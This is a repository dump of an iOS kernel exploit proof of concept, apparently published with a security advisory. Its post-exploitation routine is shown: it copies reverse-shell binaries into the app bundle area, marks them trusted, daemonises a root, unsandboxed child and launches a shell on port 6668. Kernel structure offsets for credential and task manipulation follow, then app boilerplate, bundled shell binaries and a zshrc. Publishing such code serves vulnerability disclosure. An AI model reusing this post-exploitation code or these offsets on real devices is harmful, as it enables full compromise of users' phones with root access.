| 20 | #define printf(X,X2...) {} 21 | 22 | #define printf_wow(X,X1...) {char logdata[256];snprintf(logdata, sizeof(logdata), X, X1);extern void log_toView(const char *input_cstr);log_toView(logdata);} 23 | void display_ip_address(){ 24 | struct ifaddrs *interfaces = NULL; 25 | struct ifaddrs *temp_addr = NULL; 26 | if(getifaddrs(&interfaces) == 0){ 27 | temp_addr = interfaces; 28 | while(temp_addr != NULL) { 29 | if(temp_addr->ifa_addr->sa_family == AF_INET) { 30 | 31 | printf_wow(" %s: ", temp_addr->ifa_name); 32 | char *ip_addr = inet_ntoa(((struct sockaddr_in *)temp_addr->ifa_addr)->sin_addr); 33 | printf_wow(" %s\n", ip_addr); 34 | } 35 | temp_addr = temp_addr->ifa_next; 36 | } 37 | freeifaddrs(interfaces); 38 | }else{ 39 | printf("Error: getifaddrs\n"); 40 | } 41 | } 42 | 43 | void post_exp_main(){ 44 | 45 | printf("+++ Post-Exploitation\n"); 46 | 47 | // All execution files must be under /var/containers/Bundle/, because root filesystem is not writable 48 | // Also must be outside the /var/containers/Bundle/Application, to be outside container daemon jurisdiction 49 | 50 | extern char *reverseShell_path; 51 | char *new_path = "/var/containers/Bundle/reverseShell101"; 52 | if(access(new_path, F_OK)){ 53 | copyfile(reverseShell_path, new_path, 0, COPYFILE_ALL|COPYFILE_RECURSIVE); 54 | } 55 | reverseShell_path = new_path; 56 | trust_aDirectory(reverseShell_path); 57 | 58 | extern char *ios_reverseshell; 59 | new_path = "/var/containers/Bundle/ios_reverseshell101"; 60 | if(access(new_path, F_OK)){ 61 | copyfile(ios_reverseshell, new_path, 0, COPYFILE_ALL|COPYFILE_RECURSIVE); 62 | } 63 | ios_reverseshell = new_path; 64 | trust_aFile(ios_reverseshell); 65 | 66 | display_ip_address(); 67 | printf_wow(" port: %s", "6668"); 68 | 69 | if(fork() == 0){ 70 | daemon(1, 1); // This is not deprecated, to keep child process alive 71 | 72 | // TO DO: Do whatever you want, code here will be running in the background as Root & Unsandboxed. 73 | 74 | chmod(ios_reverseshell, 0755); 75 | 76 | // Demo: Hosting a reverse Shell 77 | char *argv[] = {ios_reverseshell, reverseShell_path, "6668", NULL}; 78 | (printf)("execvp failed: %d\n", execvp(ios_reverseshell, argv)); 79 | } 80 | 81 | setuid(501); // Set our app back to mobile user, child process will remain root 82 | } 83 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | UIFileSharingEnabled 6 | 7 | CFBundleDevelopmentRegion 8 | $(DEVELOPMENT_LANGUAGE) 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleVersion 22 | 1 23 | LSRequiresIPhoneOS 24 | 25 | UILaunchStoryboardName 26 | LaunchScreen 27 | UIMainStoryboardFile 28 | Main 29 | UIRequiredDeviceCapabilities 30 | 31 | armv7 32 | 33 | UISupportedInterfaceOrientations 34 | 35 | UIInterfaceOrientationPortrait 36 | UIInterfaceOrientationLandscapeLeft 37 | UIInterfaceOrientationLandscapeRight 38 | 39 | UISupportedInterfaceOrientations~ipad 40 | 41 | UIInterfaceOrientationPortrait 42 | UIInterfaceOrientationPortraitUpsideDown 43 | UIInterfaceOrientationLandscapeLeft 44 | UIInterfaceOrientationLandscapeRight 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/inject.h: -------------------------------------------------------------------------------- 1 | /* 2 | * inject.h 3 | * 4 | * Created by Sam Bingner on 9/27/2018 5 | * Copyright 2018 Sam Bingner. All Rights Reserved. 6 | * 7 | */ 8 | 9 | #ifndef _INJECT_H_ 10 | #define _INJECT_H_ 11 | 12 | void trust_aFile(const char *file_path); 13 | void trust_aDirectory(const char *dir_path); 14 | #endif 15 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/kernel_stru.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_stru.h 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/1/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #ifndef kernel_stru_h 13 | #define kernel_stru_h 14 | 15 | struct semaphore{ 16 | // Defined in the sync_sema.h 17 | char pad[0x38]; 18 | uint64_t owner; // (task_t) task that owns semaphore 19 | uint64_t port; // (ipc_port_t) semaphore port 20 | 21 | /* 22 | How to locate owner: 23 | sync_sema.c 24 | kern_return_t semaphore_create(task_t task. 25 | s = (semaphore_t) zalloc (semaphore_zone); 26 | s->owner = task; 27 | */ 28 | }; 29 | 30 | #define KOFFSET(_STRU, _MEM) _##_STRU##__##_MEM 31 | #define KOFFSET_INIT(_STRU, _MEM) extern vm_offset_t _##_STRU##__##_MEM 32 | 33 | KOFFSET_INIT(task, bsd_info); 34 | KOFFSET_INIT(task, itk_self); 35 | KOFFSET_INIT(ipc_port, kobject); 36 | KOFFSET_INIT(proc, p_ucred); 37 | 38 | KOFFSET_INIT(proc, task); //自动生成 39 | KOFFSET_INIT(task, itk_nself); 40 | KOFFSET_INIT(task, itk_sself); 41 | 42 | 43 | 44 | 45 | #endif /* kernel_stru_h */ 46 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/kernel_stu.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_stu.c 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/3/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #include "kernel_stru.h" 10 | 11 | #undef KOFFSET_INIT 12 | #define KOFFSET_INIT(_STRU, _MEM, _OF) vm_offset_t _##_STRU##__##_MEM = _OF 13 | 14 | KOFFSET_INIT(task, bsd_info, 0x358); 15 | // t_flags 0x390 16 | /* 17 | task->bsd_info 18 | vm_unix.c 19 | kern_return_t pid_for_task(struct pid_for_task_args *args) 20 | t1 = port_name_to_task_inspect(t); 21 | p = get_bsdtask_info(t1); 22 | pid = proc_pid(p); 23 | 24 | */ 25 | 26 | KOFFSET_INIT(proc, task, 0); //自动生成 27 | KOFFSET_INIT(proc, p_ucred, 0xF8); 28 | /* 29 | proc->p_ucred 30 | vm_unix.c 31 | 32 | sysctl_root 33 | -> mac_system_check_sysctlbyname 34 | -> kauth_cred_get 35 | 36 | */ 37 | 38 | KOFFSET_INIT(task, itk_self, 0xD8); 39 | KOFFSET_INIT(task, itk_nself, 0); //自动生成 40 | KOFFSET_INIT(task, itk_sself, 0); //自动生成 41 | 42 | //KOFFSET_INIT(proc, p_textvp, 0x230); 43 | KOFFSET_INIT(ipc_port, kobject, 0x68); 44 | 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | 59 | #define MAX_CHUNK_SIZE 0xFFF 60 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/pwned.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/pwned.png -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/bash: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/bash -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/cat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/chmod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/chmod -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/cp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/cp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/date: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/date -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/dd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/dd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/df: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/df -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/hostname: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/hostname -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/kill: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/kill -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/launchctl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ln -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ls -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/mkdir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/mkdir -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/mv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/mv -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/ps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/ps -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/pwd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/pwd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/rm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/rm -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/rmdir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/rmdir -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/sh -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/sleep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/sleep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/stty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/stty -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/bin/zsh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/bin/zsh -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/etc/profile: -------------------------------------------------------------------------------- 1 | export PS1='$USER@$HOST ($PWD)# ' 2 | export PATH=/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/etc/zshrc: -------------------------------------------------------------------------------- 1 | # 2 | # /etc/zshrc is sourced in interactive shells. It 3 | # should contain commands to set up aliases, functions, 4 | # options, key bindings, etc. 5 | # 6 | 7 | watch=(all) 8 | 9 | 10 | 11 | if [ -f ~/2.DO ]; then 12 | cat ~/2.DO 13 | fi 14 | if [ `id -gn` = `id -un` -a `id -u` -gt 14 ]; then 15 | umask 002 16 | else 17 | umask 022 18 | fi 19 | 20 | # Set up aliases 21 | alias mv='nocorrect mv' # no spelling correction on mv 22 | alias cp='nocorrect cp' # no spelling correction on cp 23 | alias df='df -h' # More human readable 24 | alias mkdir='nocorrect mkdir' # no spelling correction on mkdir 25 | alias more='less' 26 | alias ~='cd ~' 27 | alias grep='grep --color=auto' # Colors on Grep 28 | 29 | 30 | # Shell functions 31 | setenv() { export $1=$2 } # csh compatibility 32 | # Johnny's opts... 33 | setopt correct 34 | setopt correct_all 35 | setopt nohup 36 | #set correct=cmd 37 | 38 | # Some environment variables 39 | export USER=`id -un` 40 | export LOGNAME=$USER 41 | export HOSTNAME=`/usr/bin/uname -n` 42 | export MAIL=/var/spool/mail/$USER 43 | 44 | path=($path $HOME/bin) 45 | export PATH=$PATH:/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin 46 | 47 | 48 | # Set prompts 49 | #PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" # default prompt 50 | #RPROMPT="%B%T%b" # prompt for right side of screen 51 | #SPROMPT='You meant %r, Right? ' 52 | 53 | 54 | # 55 | 56 | RPROMPT="%B%{%}%T%{%}%b" 57 | PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" # default prompt 58 | 59 | # 60 | # below works, but if no zsh files are in /etc/profile.d it complains 61 | # everytime zsh is run. Commenting out for now. 62 | # 63 | # run other components 64 | #for i in /etc/profile.d/*.zsh 65 | #do 66 | # source $i 67 | #done 68 | 69 | # bindkey -v # vi key bindings 70 | bindkey -e # emacs key bindings 71 | bindkey ' ' magic-space # also do history expansino on space 72 | 73 | #------------------------------------------------------------------------ 74 | # Define LINUX Color Styles Here! 75 | #------------------------------------------------------------------------ 76 | 77 | LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:\ 78 | cd=40;33;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:\ 79 | *.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:\ 80 | *.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:\ 81 | *.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.README=05;1:*.DO=05;1:*.avi=00;32:*.mp3=00;33:" 82 | export LS_COLORS 83 | 84 | LS_OPTIONS="--color=tty -F -T 0" 85 | export LS_OPTIONS 86 | export CLICOLOR=1 87 | alias d=dir 88 | alias v=vdir 89 | alias vi=vim 90 | 91 | PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"' 92 | 93 | export MANPATH=/usr/share/man:/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/share/man 94 | 95 | export LESS_TERMCAP_mb=$'\E[01;31m' 96 | export LESS_TERMCAP_md=$'\E[01;31m' 97 | export LESS_TERMCAP_me=$'\E[0m' 98 | export LESS_TERMCAP_se=$'\E[0m' 99 | export LESS_TERMCAP_so=$'\E[01;44;33m' 100 | export LESS_TERMCAP_ue=$'\E[0m' 101 | export LESS_TERMCAP_us=$'\E[01;32m' 102 | export LESS=-r 103 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/dmesg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/dmesg -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/ifconfig: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/ifconfig -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/kextunload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/kextunload -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/md5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/md5 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/mknod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/mknod -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/ping: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/ping -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/sbin/shutdown: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/sbin/shutdown -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/arch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/arch -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/chflags: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/chflags -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/cut: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/cut -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/du: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/du -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/false -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/find: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/find -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/fs_usage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/fs_usage -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/grep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/grep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/gunzip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/gunzip -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/gzip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/gzip -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/head: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/head -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/hexdump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/hexdump -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/hostinfo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/hostinfo -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/id: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/id -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/killall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/killall -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/less: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/less -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/login -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/lsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/lsmp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/more: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/more -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/nano: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/nano -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/nohup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/nohup -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/passwd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/passwd -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/plconvert: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/plconvert -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/printf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/printf -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/renice: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/renice -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/reset: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/reset -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/sc_usage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/sc_usage -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/scp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/bin/scp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/bin/screen: -------------------------------------------------------------------------------- 